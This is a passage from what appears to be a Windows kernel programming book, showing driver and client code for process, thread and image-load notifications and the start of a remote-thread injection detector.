UNICODE_STRING symLink = RTL_CONSTANT_STRING(L"\\??\\sysmon");
IoDeleteSymbolicLink(&symLink);
IoDeleteDevice(DriverObject->DeviceObject);
}
The linked list items are freed by repeatedly removing items from the list and calling ExFreePool on
each item.
The User Mode Client
Once we have all this in place, we can write a user mode client that polls data using ReadFile and
displays the results.
The main function calls ReadFile in a loop, sleeping a bit so that the thread is not always consuming
CPU. Once some data arrives, it’s sent for display purposes:
#include <Windows.h>
#include <stdio.h>
#include <memory>
#include <string>
#include "..\SysMon\SysMonPublic.h"
int main() {
auto hFile = CreateFile(L"\\\\.\\SysMon", GENERIC_READ, 0,
nullptr, OPEN_EXISTING, 0, nullptr);
if (hFile == INVALID_HANDLE_VALUE)
return Error("Failed to open file");   // Error helper as used in earlier chapters' clients
int size = 1 << 16;    // 64 KB
auto buffer = std::make_unique<BYTE[]>(size);
while (true) {
DWORD bytes = 0;
// error handling omitted
ReadFile(hFile, buffer.get(), size, &bytes, nullptr);
if (bytes)
DisplayInfo(buffer.get(), bytes);
// wait a bit before polling again
Sleep(400);
}
// never actually reached
CloseHandle(hFile);
return 0;
}
The DisplayInfo function must make sense of the buffer it’s given. Since all events start with a common
header, the function distinguishes the various events based on the ItemType. After the event has been
dealt with, the Size field in the header indicates where the next event starts:
void DisplayInfo(BYTE* buffer, DWORD size) {
while (size > 0) {
auto header = (ItemHeader*)buffer;
switch (header->Type) {
case ItemType::ProcessExit:
{
DisplayTime(header->Time);
auto info = (ProcessExitInfo*)buffer;
printf("Process %u Exited (Code: %u)\n",
info->ProcessId, info->ExitCode);
break;
}
case ItemType::ProcessCreate:
{
DisplayTime(header->Time);
auto info = (ProcessCreateInfo*)buffer;
std::wstring commandline(info->CommandLine,
info->CommandLineLength);
printf("Process %u Created. Command line: %ws\n",
info->ProcessId, commandline.c_str());
break;
}
}
buffer += header->Size;
size -= header->Size;
}
}
To extract the command line properly, the code uses the C++ wstring class constructor that can build a
string based on a pointer and the string length. The DisplayTime helper function formats the time in a
human-readable way:
void DisplayTime(const LARGE_INTEGER& time) {
//
// LARGE_INTEGER and FILETIME have the same size
// representing the same format in our case
//
FILETIME local;
//
// convert to local time first (KeQuerySystemTime(Precise) returns UTC)
//
FileTimeToLocalFileTime((FILETIME*)&time, &local);
SYSTEMTIME st;
FileTimeToSystemTime(&local, &st);
printf("%02d:%02d:%02d.%03d: ",
st.wHour, st.wMinute, st.wSecond, st.wMilliseconds);
}
SYSTEMTIME is a convenient structure to work with, as it contains all ingredients of a date and time. In
the above code, only the time is displayed, but the date components are present as well.
That’s all we need to begin testing the driver and the client.
The driver can be installed and started as done in earlier chapters, similar to the following:
sc create sysmon type= kernel binPath= C:\Test\SysMon.sys
sc start sysmon
Here is some sample output when running SysMonClient.exe:
16:18:51.961: Process 13124 Created. Command line: "C:\Program Files (x86)\Micr\
osoft\Edge\Application\97.0.1072.62\identity_helper.exe" --type=utility --utili\
ty-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,1091\
8786588500781911,4196358801973005731,131072 --lang=en-US --service-sandbox-type\
=none --mojo-platform-channel-handle=5404 /prefetch:8
16:18:51.967: Process 13124 Exited (Code: 3221226029)
16:18:51.969: Process 6216 Created. Command line: "C:\Program Files (x86)\Micro\
soft\Edge\Application\97.0.1072.62\identity_helper.exe" --type=utility --utilit\
y-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,10918\
786588500781911,4196358801973005731,131072 --lang=en-US --service-sandbox-type=\
none --mojo-platform-channel-handle=5404 /prefetch:8
16:18:53.836: Thread 12456 Created in process 10720
16:18:58.159: Process 10404 Exited (Code: 1)
16:19:02.033: Process 6216 Exited (Code: 0)
16:19:28.163: Process 9360 Exited (Code: 0)
Thread Notifications
The kernel provides thread creation and destruction callbacks, similarly to process callbacks. The API to
use for registration is PsSetCreateThreadNotifyRoutine and for unregistering there is another API,
PsRemoveCreateThreadNotifyRoutine:
NTSTATUS PsSetCreateThreadNotifyRoutine(
_In_ PCREATE_THREAD_NOTIFY_ROUTINE NotifyRoutine);
NTSTATUS PsRemoveCreateThreadNotifyRoutine (
_In_ PCREATE_THREAD_NOTIFY_ROUTINE NotifyRoutine);
The arguments provided to the callback routine are the process ID, thread ID and whether the thread is
being created or destroyed:
typedef void (*PCREATE_THREAD_NOTIFY_ROUTINE)(
_In_ HANDLE ProcessId,
_In_ HANDLE ThreadId,
_In_ BOOLEAN Create);
If a thread is created, the callback is executed by the creator thread; if the thread exits, the callback executes
on that thread.
We’ll extend the existing SysMon driver to receive thread notifications as well as process notifications.
First, we’ll add enum values for thread events and a structure representing the information, all in the
SysMonCommon.h header file:
enum class ItemType : short {
None,
ProcessCreate,
ProcessExit,
ThreadCreate,
ThreadExit
};
struct ThreadCreateInfo : ItemHeader {
ULONG ThreadId;
ULONG ProcessId;
};
struct ThreadExitInfo : ThreadCreateInfo {
ULONG ExitCode;
};
It’s convenient to have ThreadExitInfo inherit from ThreadCreateInfo, as they share the thread
and process IDs. It’s certainly not mandatory, but it makes the thread notification callback a bit simpler to
write.
Now we can add the proper registration to DriverEntry, right after registering for process notifications:
status = PsSetCreateThreadNotifyRoutine(OnThreadNotify);
if (!NT_SUCCESS(status)) {
KdPrint((DRIVER_PREFIX "failed to set thread callbacks (0x%08X)\n",
status));
break;
}
Conversely, a call to PsRemoveCreateThreadNotifyRoutine is needed in the Unload routine:
// in SysMonUnload
PsRemoveCreateThreadNotifyRoutine(OnThreadNotify);
The callback routine itself is simpler than the process notification callback, since the event structures have
fixed sizes. Here is the thread callback routine in its entirety:
void OnThreadNotify(HANDLE ProcessId, HANDLE ThreadId, BOOLEAN Create) {
//
// handle create and exit with the same code block, tweaking as needed
//
auto size = Create ? sizeof(FullItem<ThreadCreateInfo>)
: sizeof(FullItem<ThreadExitInfo>);
auto info = (FullItem<ThreadExitInfo>*)ExAllocatePoolWithTag(
PagedPool, size, DRIVER_TAG);
if (info == nullptr) {
KdPrint((DRIVER_PREFIX "Failed to allocate memory\n"));
return;
}
auto& item = info->Data;
KeQuerySystemTimePrecise(&item.Time);
item.Size = Create ? sizeof(ThreadCreateInfo) : sizeof(ThreadExitInfo);
item.Type = Create ? ItemType::ThreadCreate : ItemType::ThreadExit;
item.ProcessId = HandleToULong(ProcessId);
item.ThreadId = HandleToULong(ThreadId);
if (!Create) {
PETHREAD thread;
if (NT_SUCCESS(PsLookupThreadByThreadId(ThreadId, &thread))) {
item.ExitCode = PsGetThreadExitStatus(thread);
ObDereferenceObject(thread);
}
}
g_State.AddItem(&info->Entry);
}
Most of this code should look pretty familiar. The slightly complex part is retrieving the thread exit code.
PsGetThreadExitStatus can be used for that, but the API requires a thread object pointer rather
than an ID. PsLookupThreadByThreadId is used to obtain the thread object, which is then passed to
PsGetThreadExitStatus. It’s important to remember to call ObDereferenceObject on the thread
object, or else it will linger in memory until the next system restart.
To complete the implementation, we’ll add code to the client that knows how to display thread creation
and destruction (in the switch block inside DisplayInfo):
case ItemType::ThreadCreate:
{
DisplayTime(header->Time);
auto info = (ThreadCreateInfo*)buffer;
printf("Thread %u Created in process %u\n",
info->ThreadId, info->ProcessId);
break;
}
case ItemType::ThreadExit:
{
DisplayTime(header->Time);
auto info = (ThreadExitInfo*)buffer;
printf("Thread %u Exited from process %u (Code: %u)\n",
info->ThreadId, info->ProcessId, info->ExitCode);
break;
}
Here is some sample output given the updated driver and client:
16:19:41.500: Thread 10512 Created in process 9304
16:19:41.500: Thread 10512 Exited from process 9304 (Code: 0)
16:19:41.500: Thread 4424 Exited from process 9304 (Code: 0)
16:19:41.501: Thread 10180 Exited from process 9304 (Code: 0)
16:19:41.777: Process 14324 Created. Command line: "C:\WINDOWS\system32\defrag.\
exe" -p bf8 -s 00000000000003BC -b -OnlyPreferred C:
16:19:41.777: Thread 8120 Created in process 14324
16:19:41.780: Process 11572 Created. Command line: \??\C:\WINDOWS\system32\conh\
ost.exe 0xffffffff -ForceV1
16:19:41.780: Thread 7952 Created in process 11572
16:19:41.784: Thread 8748 Created in process 11572
16:19:41.784: Thread 6408 Created in process 11572
Add client code that displays the process image name for thread create and exit.
Windows 10 adds another registration function that provides additional flexibility.
typedef enum _PSCREATETHREADNOTIFYTYPE {
PsCreateThreadNotifyNonSystem = 0,
PsCreateThreadNotifySubsystems = 1
} PSCREATETHREADNOTIFYTYPE;
NTSTATUS PsSetCreateThreadNotifyRoutineEx(
    _In_ PSCREATETHREADNOTIFYTYPE NotifyType,
    _In_ PVOID NotifyInformation);   // PCREATE_THREAD_NOTIFY_ROUTINE
Using PsCreateThreadNotifyNonSystem indicates the callback for new threads should execute on
the newly created thread, rather than the creator.
Image Load Notifications
The last callback mechanism we’ll look at in this chapter is image load notifications. Whenever a PE image
(EXE, DLL, driver) file loads, the driver can receive a notification.
The PsSetLoadImageNotifyRoutine API registers for these notifications, and PsRemoveImageNo-
tifyRoutine is used for unregistering:
NTSTATUS PsSetLoadImageNotifyRoutine(
_In_ PLOAD_IMAGE_NOTIFY_ROUTINE NotifyRoutine);
NTSTATUS PsRemoveLoadImageNotifyRoutine(
_In_ PLOAD_IMAGE_NOTIFY_ROUTINE NotifyRoutine);
The callback function has the following prototype:
typedef void (*PLOAD_IMAGE_NOTIFY_ROUTINE)(
    _In_opt_ PUNICODE_STRING FullImageName,
    _In_ HANDLE ProcessId,       // pid into which image is being mapped
    _In_ PIMAGE_INFO ImageInfo);
Curiously enough, there is no callback mechanism for image unloads.
The FullImageName argument is somewhat tricky. As indicated by the SAL annotation, it’s optional and
can be NULL. Even if it’s not NULL, it doesn’t always produce the correct image file name before Windows
10. The reasons for that are rooted deep in the kernel, its I/O system, and the file system cache. In most
cases, this works fine, and the format of the path is the internal NT format, starting with something like
“\Device\HarddiskVolumex\…” rather than “c:\…”. Translation can be done in a few ways; we’ll see one
when we look at the client code.
The ProcessId argument is the process ID into which the image is loaded. For drivers (kernel modules),
this value is zero.
The ImageInfo argument contains additional information on the image, declared as follows:
#define IMAGE_ADDRESSING_MODE_32BIT     3

typedef struct _IMAGE_INFO {
    union {
        ULONG Properties;
        struct {
            ULONG ImageAddressingMode  : 8;  // Code addressing mode
            ULONG SystemModeImage      : 1;  // System mode image
            ULONG ImageMappedToAllPids : 1;  // Image mapped into all processes
            ULONG ExtendedInfoPresent  : 1;  // IMAGE_INFO_EX available
            ULONG MachineTypeMismatch  : 1;  // Architecture type mismatch
            ULONG ImageSignatureLevel  : 4;  // Signature level
            ULONG ImageSignatureType   : 3;  // Signature type
            ULONG ImagePartialMap      : 1;  // Nonzero if entire image is not mapped
            ULONG Reserved             : 12;
        };
    };
    PVOID  ImageBase;
    ULONG  ImageSelector;
    SIZE_T ImageSize;
    ULONG  ImageSectionNumber;
} IMAGE_INFO, *PIMAGE_INFO;
Here is a quick rundown of the important fields in this structure:
• SystemModeImage - this flag is set for a kernel image, and unset for a user-mode image.
• ImageSignatureLevel - signing level for Protected Processes Light (PPL) (Windows 8.1 and later).
See the SE_SIGNING_LEVEL_ constants in the WDK.
• ImageSignatureType - signature type for PPL (Windows 8.1 and later). See the SE_IMAGE_SIGNATURE_TYPE
enumeration in the WDK.
• ImageBase - the virtual address into which the image is loaded.
• ImageSize - the size of the image.
• ExtendedInfoPresent - if this flag is set, then IMAGE_INFO is part of a larger structure, IMAGE_INFO_EX,
shown here:
typedef struct _IMAGE_INFO_EX {
    SIZE_T              Size;
    IMAGE_INFO          ImageInfo;
    struct _FILE_OBJECT *FileObject;
} IMAGE_INFO_EX, *PIMAGE_INFO_EX;
To access this larger structure, a driver can use the CONTAINING_RECORD macro like so:
if (ImageInfo->ExtendedInfoPresent) {
auto exinfo = CONTAINING_RECORD(ImageInfo, IMAGE_INFO_EX, ImageInfo);
// access FileObject
}
The extended structure adds just one meaningful member - the file object used to open the image. This
may be useful for retrieving the file name on pre-Windows 10 machines, as we’ll soon see.
As with the process and thread notifications, we’ll add the needed code to register in DriverEntry and
the code to unregister in the Unload routine. Here is the full DriverEntry function (with KdPrint calls
removed for brevity):
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING) {
auto status = STATUS_SUCCESS;
PDEVICE_OBJECT DeviceObject = nullptr;
UNICODE_STRING symLink = RTL_CONSTANT_STRING(L"\\??\\sysmon");
bool symLinkCreated = false;
bool processCallbacks = false, threadCallbacks = false;
do {
UNICODE_STRING devName = RTL_CONSTANT_STRING(L"\\Device\\sysmon");
status = IoCreateDevice(DriverObject, 0, &devName,
FILE_DEVICE_UNKNOWN, 0, TRUE, &DeviceObject);
if (!NT_SUCCESS(status)) {
break;
}
DeviceObject->Flags |= DO_DIRECT_IO;
status = IoCreateSymbolicLink(&symLink, &devName);
if (!NT_SUCCESS(status)) {
break;
}
symLinkCreated = true;
status = PsSetCreateProcessNotifyRoutineEx(OnProcessNotify, FALSE);
if (!NT_SUCCESS(status)) {
break;
}
processCallbacks = true;
status = PsSetCreateThreadNotifyRoutine(OnThreadNotify);
if (!NT_SUCCESS(status)) {
break;
}
threadCallbacks = true;
status = PsSetLoadImageNotifyRoutine(OnImageLoadNotify);
if (!NT_SUCCESS(status)) {
break;
}
} while (false);
if (!NT_SUCCESS(status)) {
if (threadCallbacks)
PsRemoveCreateThreadNotifyRoutine(OnThreadNotify);
if (processCallbacks)
PsSetCreateProcessNotifyRoutineEx(OnProcessNotify, TRUE);
if (symLinkCreated)
IoDeleteSymbolicLink(&symLink);
if (DeviceObject)
IoDeleteDevice(DeviceObject);
return status;
}
g_State.Init(10000);
DriverObject->DriverUnload = SysMonUnload;
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] = SysMonCreateClose;
DriverObject->MajorFunction[IRP_MJ_READ] = SysMonRead;
return status;
}
We’ll add an event type to the ItemType enum:
enum class ItemType : short {
    None,
    ProcessCreate,
    ProcessExit,
    ThreadCreate,
    ThreadExit,
    ImageLoad
};
As before, we need a structure to contain the information we can get from image load:
const int MaxImageFileSize = 300;

struct ImageLoadInfo : ItemHeader {
    ULONG ProcessId;
    ULONG ImageSize;
    ULONG64 LoadAddress;
    WCHAR ImageFileName[MaxImageFileSize + 1];
};
For variety, ImageLoadInfo uses a fixed size array to store the path to the image file. The interested
reader should change that to use a scheme similar to process create notifications.
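For readers attempting that exercise, the shape of such a scheme can be sketched in user mode (my own illustration; all names here are hypothetical, and a kernel version would use ExAllocatePoolWithTag instead of malloc):

```cpp
#include <cassert>
#include <cstdlib>
#include <cwchar>

// Hypothetical variable-length item: a fixed header immediately followed by
// the image path, allocated together so a single free releases both.
struct ImageLoadItem {
    unsigned long ProcessId;
    unsigned short PathLength;  // length in characters, excluding terminator
    wchar_t Path[1];            // actually PathLength + 1 characters
};

ImageLoadItem* MakeItem(unsigned long pid, const wchar_t* path) {
    size_t chars = wcslen(path);
    // One allocation sized for the header plus the extra characters.
    auto item = (ImageLoadItem*)malloc(sizeof(ImageLoadItem) + chars * sizeof(wchar_t));
    if (item == nullptr)
        return nullptr;
    item->ProcessId = pid;
    item->PathLength = (unsigned short)chars;
    wmemcpy(item->Path, path, chars + 1);   // copy including the terminator
    return item;
}
```

This mirrors the idea behind the process create notification item: one allocation, with the string carried inline after the fixed part.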
The image load notification starts by not storing information on kernel images:
void OnImageLoadNotify(PUNICODE_STRING FullImageName,
    HANDLE ProcessId, PIMAGE_INFO ImageInfo) {
    if (ProcessId == nullptr) {
        // system image, ignore
        return;
    }
This is not necessary, of course. You can remove the above check so that kernel images are reported as
well. Next, we allocate the data structure and fill in the usual information:
    auto size = sizeof(FullItem<ImageLoadInfo>);
    auto info = (FullItem<ImageLoadInfo>*)ExAllocatePoolWithTag(PagedPool,
        size, DRIVER_TAG);
    if (info == nullptr) {
        KdPrint((DRIVER_PREFIX "Failed to allocate memory\n"));
        return;
    }
    auto& item = info->Data;
    KeQuerySystemTimePrecise(&item.Time);
    item.Size = sizeof(item);
    item.Type = ItemType::ImageLoad;
    item.ProcessId = HandleToULong(ProcessId);
    item.ImageSize = (ULONG)ImageInfo->ImageSize;
    item.LoadAddress = (ULONG64)ImageInfo->ImageBase;
The interesting part is the image path. The simplest option is to examine FullImageName, and if non-
NULL, just grab its contents. But since this information might be missing or not 100% reliable, we can try
something else first, and fall back on FullImageName if all else fails.
The secret is to use FltGetFileNameInformationUnsafe, a variant of FltGetFileNameInformation that is used with File System Mini-filters, as we’ll see in chapter 12. The “Unsafe” version can be called in non-file-system contexts, as is our case. A full discussion of FltGetFileNameInformation is saved for chapter 12. For now, let’s just use it if the file object is available:
    item.ImageFileName[0] = 0;  // assume no file information
    if (ImageInfo->ExtendedInfoPresent) {
        auto exinfo = CONTAINING_RECORD(ImageInfo, IMAGE_INFO_EX, ImageInfo);
        PFLT_FILE_NAME_INFORMATION nameInfo;
        if (NT_SUCCESS(FltGetFileNameInformationUnsafe(exinfo->FileObject,
            nullptr, FLT_FILE_NAME_NORMALIZED | FLT_FILE_NAME_QUERY_DEFAULT,
            &nameInfo))) {
            // copy the file path
            wcscpy_s(item.ImageFileName, nameInfo->Name.Buffer);
            FltReleaseFileNameInformation(nameInfo);
        }
    }
FltGetFileNameInformationUnsafe requires the file object, which can be obtained from the extended IMAGE_INFO_EX structure. wcscpy_s ensures we don’t copy more characters than are available in the buffer. FltReleaseFileNameInformation must be called to free the PFLT_FILE_NAME_INFORMATION object allocated by FltGetFileNameInformationUnsafe.
To gain access to these functions, add an #include for <FltKernel.h> and add FltMgr.lib to the Linker Input / Additional Dependencies line.
Finally, if this method does not produce a result, we fall back to using the provided image path:
    if (item.ImageFileName[0] == 0 && FullImageName) {
        wcscpy_s(item.ImageFileName, FullImageName->Buffer);
    }
    g_State.AddItem(&info->Entry);
Here is the full image load notification code for easier reference (KdPrint removed):
void OnImageLoadNotify(PUNICODE_STRING FullImageName, HANDLE ProcessId,
    PIMAGE_INFO ImageInfo) {
    if (ProcessId == nullptr) {
        // system image, ignore
        return;
    }

    auto size = sizeof(FullItem<ImageLoadInfo>);
    auto info = (FullItem<ImageLoadInfo>*)ExAllocatePoolWithTag(
        PagedPool, size, DRIVER_TAG);
    if (info == nullptr)
        return;

    auto& item = info->Data;
    KeQuerySystemTimePrecise(&item.Time);
    item.Size = sizeof(item);
    item.Type = ItemType::ImageLoad;
    item.ProcessId = HandleToULong(ProcessId);
    item.ImageSize = (ULONG)ImageInfo->ImageSize;
    item.LoadAddress = (ULONG64)ImageInfo->ImageBase;
    item.ImageFileName[0] = 0;

    if (ImageInfo->ExtendedInfoPresent) {
        auto exinfo = CONTAINING_RECORD(ImageInfo, IMAGE_INFO_EX, ImageInfo);
        PFLT_FILE_NAME_INFORMATION nameInfo;
        if (NT_SUCCESS(FltGetFileNameInformationUnsafe(
            exinfo->FileObject, nullptr,
            FLT_FILE_NAME_NORMALIZED | FLT_FILE_NAME_QUERY_DEFAULT,
            &nameInfo))) {
            wcscpy_s(item.ImageFileName, nameInfo->Name.Buffer);
            FltReleaseFileNameInformation(nameInfo);
        }
    }
    if (item.ImageFileName[0] == 0 && FullImageName) {
        wcscpy_s(item.ImageFileName, FullImageName->Buffer);
    }
    g_State.AddItem(&info->Entry);
}
Final Client Code
The client code must be extended for image loads. It seems easy enough except for one snag: the resulting
image path retrieved in the image load notification is in NT Device form, instead of the more common,
“DOS based” form with drive letters, which in fact are symbolic links. We can see these mappings in tools
such as WinObj from Sysinternals (figure 9-3).
Figure 9-3: Symbolic links in WinObj
Notice the device name targets for C: and D: in figure 9-3. A file like c:\temp\mydll.dll will be reported as
\Device\HarddiskVolume3\temp\mydll.dll. It would be nice if the display showed the common
mappings instead of the NT device name.
One way of getting these mappings is by calling QueryDosDevice, which retrieves the target of a
symbolic link stored in the “??” Object Manager directory. We are already familiar with these symbolic
links, as they are valid strings to the CreateFile API.
Based on QueryDosDevice, we can loop over all existing drive letters and store the targets. Then, we
can lookup every device name and find its drive letter (symbolic link). Here is a function to do that. If we
can’t find a match, we’ll just return the original string:
#include <unordered_map>

std::wstring GetDosNameFromNTName(PCWSTR path) {
    if (path[0] != L'\\')
        return path;

    static std::unordered_map<std::wstring, std::wstring> map;
    if (map.empty()) {
        auto drives = GetLogicalDrives();
        int c = 0;
        WCHAR root[] = L"X:";
        WCHAR target[128];
        while (drives) {
            if (drives & 1) {
                root[0] = 'A' + c;
                if (QueryDosDevice(root, target, _countof(target))) {
                    map.insert({ target, root });
                }
            }
            drives >>= 1;
            c++;
        }
    }

    auto pos = wcschr(path + 1, L'\\');
    if (pos == nullptr)
        return path;
    pos = wcschr(pos + 1, L'\\');
    if (pos == nullptr)
        return path;

    std::wstring ntname(path, pos - path);
    if (auto it = map.find(ntname); it != map.end())
        return it->second + std::wstring(pos);
    return path;
}
I will let the interested reader figure out how this code works. In any case, since user-mode is not the focus
of this book, you can just use the function as is, as we’ll do in our client.
Here is the part in DisplayInfo that handles image load notifications (within the switch):
case ItemType::ImageLoad:
{
    DisplayTime(header->Time);
    auto info = (ImageLoadInfo*)buffer;
    printf("Image loaded into process %u at address 0x%llX (%ws)\n",
        info->ProcessId, info->LoadAddress,
        GetDosNameFromNTName(info->ImageFileName).c_str());
    break;
}
Here is some example output when running the full driver and client:
18:59:37.660: Image loaded into process 12672 at address 0x7FFD531C0000 (C:\Windows\System32\msvcp110_win.dll)
18:59:37.661: Image loaded into process 12672 at address 0x7FFD5BF30000 (C:\Windows\System32\advapi32.dll)
18:59:37.676: Thread 11416 Created in process 5820
18:59:37.676: Thread 12496 Created in process 4824
18:59:37.731: Thread 6636 Created in process 3852
18:59:37.731: Image loaded into process 12672 at address 0x7FFD59F70000 (C:\Windows\System32\ntmarta.dll)
18:59:37.735: Image loaded into process 12672 at address 0x7FFD51340000 (C:\Windows\System32\policymanager.dll)
18:59:37.735: Image loaded into process 12672 at address 0x7FFD531C0000 (C:\Windows\System32\msvcp110_win.dll)
18:59:37.737: Image loaded into process 12672 at address 0x7FFD51340000 (C:\Windows\System32\policymanager.dll)
18:59:37.737: Image loaded into process 12672 at address 0x7FFD531C0000 (C:\Windows\System32\msvcp110_win.dll)
18:59:37.756: Thread 6344 Created in process 704
18:59:37.756: Thread 6344 Created in process 704
Add the process name in image load notifications.
Create a driver that monitors process creation and allows a client application to configure
executable paths that should not be allowed to execute.
Remote Thread Detection
One interesting example of using process and thread notifications is detecting remote threads. A remote
thread is one that is created (injected) into a process different from its creator. This fairly well-known
technique can be used (for example) to force the new thread to load a DLL, essentially injecting that
DLL into another process.
This scenario is not necessarily malicious, but it could be. The most common example where this happens
is when a debugger attaches to a target and wants to break into the target. This is done by creating a
thread in the target process (by the debugger process) and pointing the thread function to an API such as
DebugBreak that forces a breakpoint, allowing the debugger to gain control.
Anti-malware systems know how to detect these scenarios, as these may be malicious. Let’s build a driver
that can make that kind of detection. At first, it seems to be very simple: when a thread is created, compare
its creator’s process ID with the target process where the thread is created, and if they are different - you
have a remote thread on your hands.
There is a small wrinkle in the above description. The first thread in any process is “remote” by definition,
because it’s created by some other process (typically the one calling CreateProcess), so this “natural”
occurrence should not be considered a remote thread creation.
If you feel up to it, code this driver on your own!
The core of the driver is the pair of process and thread notification callbacks. The most important is the thread
creation callback, where the driver’s job is to determine whether a created thread is a remote one or not.
We must keep an eye out for new processes as well, because the first thread in a new process is technically
remote, but we need to ignore it.
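The decision logic itself is small enough to model in user mode. The following simulation (my own sketch, not driver code) tracks processes that have no threads yet and classifies each thread creation:

```cpp
#include <unordered_set>

// Simulated detector state: PIDs of processes that have no threads yet.
struct Detector {
    std::unordered_set<unsigned> newProcesses;

    void OnProcessCreate(unsigned pid) {
        newProcesses.insert(pid);
    }

    // Returns true if this thread creation counts as a remote thread.
    bool OnThreadCreate(unsigned creatorPid, unsigned targetPid) {
        if (creatorPid == targetPid)
            return false;                    // created in its own process
        if (newProcesses.erase(targetPid))
            return false;                    // first thread of a new process
        return true;                         // genuinely remote
    }
};
```

Note that erasing the target PID on the first thread is exactly what lets any later cross-process thread be flagged.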
The data maintained by the driver and later provided to the client contains the following (DetectorPublic.h):
struct RemoteThread {
    LARGE_INTEGER Time;
    ULONG CreatorProcessId;
    ULONG CreatorThreadId;
    ULONG ProcessId;
    ULONG ThreadId;
};
Here is the data we’ll store as part of the driver (in KDetector.h):
struct RemoteThreadItem {
    LIST_ENTRY Link;
    RemoteThread Remote;
};

const ULONG MaxProcesses = 32;

ULONG NewProcesses[MaxProcesses];
ULONG NewProcessesCount;
ExecutiveResource ProcessesLock;
LIST_ENTRY RemoteThreadsHead;
FastMutex RemoteThreadsLock;
LookasideList<RemoteThreadItem> Lookaside;
There are a few class wrappers for kernel APIs we haven’t seen yet. FastMutex is the same we used in
the SysMon driver. ExecutiveResource is a wrapper for an ERESOURCE structure and APIs we looked
at in chapter 6. Here is its declaration and definition:
// ExecutiveResource.h

struct ExecutiveResource {
    void Init();
    void Delete();
    void Lock();
    void Unlock();
    void LockShared();
    void UnlockShared();

private:
    ERESOURCE m_res;
    bool m_CritRegion;
};

// ExecutiveResource.cpp

void ExecutiveResource::Init() {
    ExInitializeResourceLite(&m_res);
}

void ExecutiveResource::Delete() {
    ExDeleteResourceLite(&m_res);
}

void ExecutiveResource::Lock() {
    m_CritRegion = KeAreApcsDisabled();
    if (m_CritRegion)
        ExAcquireResourceExclusiveLite(&m_res, TRUE);
    else
        ExEnterCriticalRegionAndAcquireResourceExclusive(&m_res);
}

void ExecutiveResource::Unlock() {
    if (m_CritRegion)
        ExReleaseResourceLite(&m_res);
    else
        ExReleaseResourceAndLeaveCriticalRegion(&m_res);
}

void ExecutiveResource::LockShared() {
    m_CritRegion = KeAreApcsDisabled();
    if (m_CritRegion)
        ExAcquireResourceSharedLite(&m_res, TRUE);
    else
        ExEnterCriticalRegionAndAcquireResourceShared(&m_res);
}

void ExecutiveResource::UnlockShared() {
    Unlock();
}
A few things are worth noting:
• Acquiring an Executive Resource must be done in a critical region (when normal kernel APCs are
disabled). The call to KeAreApcsDisabled returns true if normal kernel APCs are disabled. In that
case a simple acquisition will do; otherwise, a critical region must be entered first, so the “shortcuts”
to enter a critical region and acquire the Executive Resource are used.
A similar API, KeAreAllApcsDisabled returns true if all APCs are disabled (essentially
whether the thread is in a guarded region).
• An Executive Resource is used to protect the NewProcesses array from concurrent write access.
The idea is that more reads than writes are expected for this data. In any case, I wanted to show a
possible wrapper for an Executive Resource.
• The class presents an interface that can work with the Locker<TLock> type we have been using for
exclusive access. For shared access, the LockShared and UnlockShared methods are provided.
To use them conveniently, a companion class to Locker<> can be written to acquire the lock in a
shared manner. Here is its definition (in Locker.h as well):
template<typename TLock>
struct SharedLocker {
    SharedLocker(TLock& lock) : m_lock(lock) {
        lock.LockShared();
    }

    ~SharedLocker() {
        m_lock.UnlockShared();
    }

private:
    TLock& m_lock;
};
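The same Locker / SharedLocker pairing can be exercised in user mode against std::shared_mutex. This is a sketch of the pattern only; the kernel version wraps an ERESOURCE, not a C++ standard mutex:

```cpp
#include <shared_mutex>

// Minimal lock type exposing the same interface as ExecutiveResource:
// Lock/Unlock for exclusive access, LockShared/UnlockShared for shared.
struct RwLock {
    std::shared_mutex m;
    void Lock() { m.lock(); }
    void Unlock() { m.unlock(); }
    void LockShared() { m.lock_shared(); }
    void UnlockShared() { m.unlock_shared(); }
};

// Exclusive RAII guard, mirroring the Locker<TLock> used in the drivers.
template<typename TLock>
struct Locker {
    explicit Locker(TLock& lock) : m_lock(lock) { m_lock.Lock(); }
    ~Locker() { m_lock.Unlock(); }
private:
    TLock& m_lock;
};

// Shared RAII guard, mirroring SharedLocker<TLock>.
template<typename TLock>
struct SharedLocker {
    explicit SharedLocker(TLock& lock) : m_lock(lock) { m_lock.LockShared(); }
    ~SharedLocker() { m_lock.UnlockShared(); }
private:
    TLock& m_lock;
};
```

Either guard releases the lock automatically at scope exit, which is the whole point of the pattern.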
LookasideList<T> is a wrapper for the lookaside lists we met in chapter 8. It uses the newer API, which
makes it easier to select the required pool type. Here is its definition (in LookasideList.h):
template<typename T>
struct LookasideList {
    NTSTATUS Init(POOL_TYPE pool, ULONG tag) {
        return ExInitializeLookasideListEx(&m_lookaside, nullptr, nullptr,
            pool, 0, sizeof(T), tag, 0);
    }

    void Delete() {
        ExDeleteLookasideListEx(&m_lookaside);
    }

    T* Alloc() {
        return (T*)ExAllocateFromLookasideListEx(&m_lookaside);
    }

    void Free(T* p) {
        ExFreeToLookasideListEx(&m_lookaside, p);
    }

private:
    LOOKASIDE_LIST_EX m_lookaside;
};
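The idea behind a lookaside list (recycle freed fixed-size blocks instead of returning them to the allocator) can be sketched in plain C++. This is an illustration of the concept only, not the Ex* API:

```cpp
#include <cstdlib>
#include <vector>

// Toy lookaside: keeps freed objects on a free list and hands them back
// on the next allocation instead of calling into the allocator again.
template<typename T>
struct ToyLookaside {
    std::vector<T*> freeList;

    T* Alloc() {
        if (!freeList.empty()) {
            T* p = freeList.back();   // fast path: recycle a freed block
            freeList.pop_back();
            return p;
        }
        return (T*)std::malloc(sizeof(T));
    }

    void Free(T* p) {
        freeList.push_back(p);        // don't release; cache for reuse
    }

    ~ToyLookaside() {
        // Only blocks sitting on the free list are released here.
        for (T* p : freeList)
            std::free(p);
    }
};
```

Because allocations of RemoteThreadItem all have the same size, this kind of cache is a natural fit for the detector driver.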
Going back to the data members for this driver. The purpose of the NewProcesses array is to keep track
of new processes before their first thread is created. Once the first thread is created, and identified as such,
the array will drop the process in question, because from that point on, any new thread created in that
process from another process is a remote thread for sure. We’ll see all that in the callback implementations.
The driver uses a simple array rather than a linked list, because I don’t expect many processes with no
threads to exist for more than a tiny fraction of a second, so a fixed-size array should be good enough. However,
you can change that to a linked list to make it bulletproof.
When a new process is created, it should be added to the NewProcesses array since the process has zero
